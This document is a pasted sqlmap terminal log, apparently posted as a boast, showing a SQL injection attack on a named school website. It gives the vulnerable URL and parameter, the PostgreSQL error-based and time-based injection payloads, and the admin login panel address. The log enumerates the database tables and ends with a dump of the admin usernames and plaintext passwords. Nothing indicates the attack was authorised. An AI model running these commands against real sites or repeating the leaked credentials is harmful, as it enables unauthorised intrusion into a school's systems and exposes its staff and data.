--- Login Panel---
http://www.savestiperstonesschool.co.uk/admin/
password at bottom :)

available databases [3]:
[*] information_schema
[*] pg_catalog
[*] public

[04:14:08] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.savestiperstonesschool.co.uk'

[*] shutting down at 04:14:08

root@kali:~# sqlmap -u http://www.savestiperstonesschool.co.uk/page/index.php?id=photo-galleries_grand-parent%27s-day -D public --tables

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 04:16:09

[04:16:09] [INFO] resuming back-end DBMS 'postgresql'
[04:16:09] [INFO] testing connection to the target URL
[04:16:10] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: PostgreSQL OR error-based - WHERE or HAVING clause
    Payload: id=-8865' OR 2447=CAST((CHR(113)||CHR(117)||CHR(103)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (2447=2447) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(120)||CHR(97)||CHR(103)||CHR(113)) AS NUMERIC) AND 'KHEY'='KHEY

    Type: AND/OR time-based blind
    Title: PostgreSQL OR time-based blind (heavy query)
    Payload: id=-7585' OR 2388=(SELECT COUNT(*) FROM GENERATE_SERIES(1,5000000)) AND 'nTco'='nTco
---
[04:16:10] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux
CentOS 5.8
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: PostgreSQL
[04:16:10] [INFO] fetching tables for database: 'public'
[04:16:12] [WARNING] reflective value(s) found and filtering out
[04:16:14] [INFO] the SQL query used returns 218 entries
Database: public
[218 tables]
[04:24:44] [INFO] fetched data logged to text files under
'/usr/share/sqlmap/output/www.savestiperstonesschool.co.uk'

[*] shutting down at 04:24:44

root@kali:~# sqlmap -u http://www.savestiperstonesschool.co.uk/page/index.php?id=photo-galleries_grand-parent%27s-day -D public -T adminuser --columns

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 04:25:47

[04:25:47] [INFO] resuming back-end DBMS 'postgresql'
[04:25:48] [INFO] testing connection to the target URL
[04:25:55] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: PostgreSQL OR error-based - WHERE or HAVING clause
    Payload: id=-8865' OR 2447=CAST((CHR(113)||CHR(117)||CHR(103)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (2447=2447) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(120)||CHR(97)||CHR(103)||CHR(113)) AS NUMERIC) AND 'KHEY'='KHEY

    Type: AND/OR time-based blind
    Title: PostgreSQL OR time-based blind (heavy query)
    Payload: id=-7585' OR 2388=(SELECT COUNT(*) FROM GENERATE_SERIES(1,5000000)) AND 'nTco'='nTco
---
[04:25:55] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux CentOS 5.8
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: PostgreSQL
[04:25:55] [INFO] fetching columns for table 'adminuser' in database 'public'
[04:25:57] [WARNING] reflective value(s) found and filtering out
[04:26:01] [INFO] the SQL query used returns 8 entries
[04:26:05] [INFO] retrieved: username
[04:26:08] [INFO] retrieved: varchar
[04:26:10] [INFO] retrieved: userpassword
[04:26:12] [INFO] retrieved: varchar
[04:26:14] [INFO] retrieved: initials
[04:26:16] [INFO] retrieved: varchar
[04:26:18] [INFO] retrieved: surname
[04:26:20] [INFO] retrieved: varchar
[04:26:22] [INFO] retrieved: prompts
[04:26:24] [INFO] retrieved: varchar
[04:26:26] [INFO] retrieved: email
[04:26:28] [INFO] retrieved: varchar
[04:26:33] [INFO] retrieved: theme
[04:26:37] [INFO] retrieved: varchar
[04:26:39] [INFO] retrieved: resultslength
[04:26:42] [INFO] retrieved: varchar
Database: public
Table: adminuser
[8 columns]
+---------------+---------+
| Column        | Type    |
+---------------+---------+
| email         | varchar |
| initials      | varchar |
| prompts       | varchar |
| resultslength | varchar |
| surname       | varchar |
| theme         | varchar |
| username      | varchar |
| userpassword  | varchar |
+---------------+---------+

[04:26:42] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.savestiperstonesschool.co.uk'

[*] shutting down at 04:26:42

root@kali:~# sqlmap -u http://www.savestiperstonesschool.co.uk/page/index.php?id=photo-galleries_grand-parent%27s-day -D public -T adminuser -C username,userpassword --dump

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 04:27:31

[04:27:31] [INFO] resuming back-end DBMS 'postgresql'
[04:27:31] [INFO] testing connection to the target URL
[04:27:33] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: PostgreSQL OR error-based - WHERE or HAVING clause
    Payload: id=-8865' OR 2447=CAST((CHR(113)||CHR(117)||CHR(103)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (2447=2447) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(120)||CHR(97)||CHR(103)||CHR(113)) AS NUMERIC) AND 'KHEY'='KHEY

    Type: AND/OR time-based blind
    Title: PostgreSQL OR time-based blind (heavy query)
    Payload: id=-7585' OR 2388=(SELECT COUNT(*) FROM GENERATE_SERIES(1,5000000)) AND 'nTco'='nTco
---
[04:27:33] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux CentOS 5.8
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: PostgreSQL
[04:27:33] [INFO] fetching columns 'username, userpassword' for table 'adminuser' in database 'public'
[04:27:35] [WARNING] reflective value(s) found and filtering out
[04:27:37] [INFO] the SQL query used returns 2 entries
[04:27:40] [INFO] retrieved: username
[04:27:42] [INFO] retrieved: varchar
[04:27:45] [INFO] retrieved: userpassword
[04:27:47] [INFO] retrieved: varchar
[04:27:47] [INFO] fetching entries of column(s) 'username, userpassword' for table 'adminuser' in database 'public'
[04:27:49] [INFO] the SQL query used returns 2 entries
[04:27:52] [INFO] retrieved: staff
[04:27:56] [INFO] retrieved: 8933127
[04:28:01] [INFO] retrieved: sws
[04:28:05] [INFO] retrieved: eastb0urne
[04:28:05] [INFO] analyzing table dump for possible password hashes
Database: public
Table: adminuser
[2 entries]
+----------+--------------+
| username | userpassword |
+----------+--------------+
| staff    | 8933127      |
| sws      | eastb0urne   |
+----------+--------------+

[04:28:05] [INFO] table 'public.adminuser' dumped to CSV file '/usr/share/sqlmap/output/www.savestiperstonesschool.co.uk/dump/public/adminuser.csv'
[04:28:05] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.savestiperstonesschool.co.uk'

[*] shutting down at 04:28:05